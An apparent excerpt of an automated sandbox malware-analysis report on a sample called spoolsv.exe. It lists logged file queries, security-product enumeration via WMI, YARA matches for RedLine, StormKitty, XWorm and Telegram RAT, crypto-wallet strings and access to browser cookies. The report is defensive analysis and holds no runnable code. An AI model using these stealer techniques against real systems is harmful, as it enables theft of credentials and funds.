                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeQueries volume information: C:\Users\user\AppData\Local\Temp\spoolsv.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeQueries volume information: C:\Users\user\AppData\Local\Temp\spoolsv.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeQueries volume information: C:\Users\user\AppData\Local\Temp\spoolsv.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeQueries volume information: C:\Users\user\AppData\Local\Temp\spoolsv.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Users\user\AppData\Local\Temp\attzwu.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeQueries volume information: C:\Users\user\AppData\Local\Temp\spoolsv.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB08152458 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,8_2_00007FFB08152458
                            Source: C:\Users\user\Desktop\spoolsv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: attzwu.exe, 0000001B.00000002.2783322173.0000000006625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\Desktop\spoolsv.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: 27.0.attzwu.exe.e20000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000000.2540965621.0000000000E22000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: attzwu.exe PID: 8096, type: MEMORYSTR
                            Yara detected StormKitty Stealer
                            Source: Yara matchFile source: 00000000.00000002.3717823961.0000000005400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4828, type: MEMORYSTR
                            Yara detected Telegram RAT
                            Source: Yara matchFile source: spoolsv.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.spoolsv.exe.bc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3717823961.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4828, type: MEMORYSTR
                            Yara detected XWorm
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: spoolsv.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.spoolsv.exe.bc0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1256711418.0000000000BC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3717823961.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4828, type: MEMORYSTR
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                            Source: powershell.exe, 00000008.00000002.1395489278.000002AE97135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
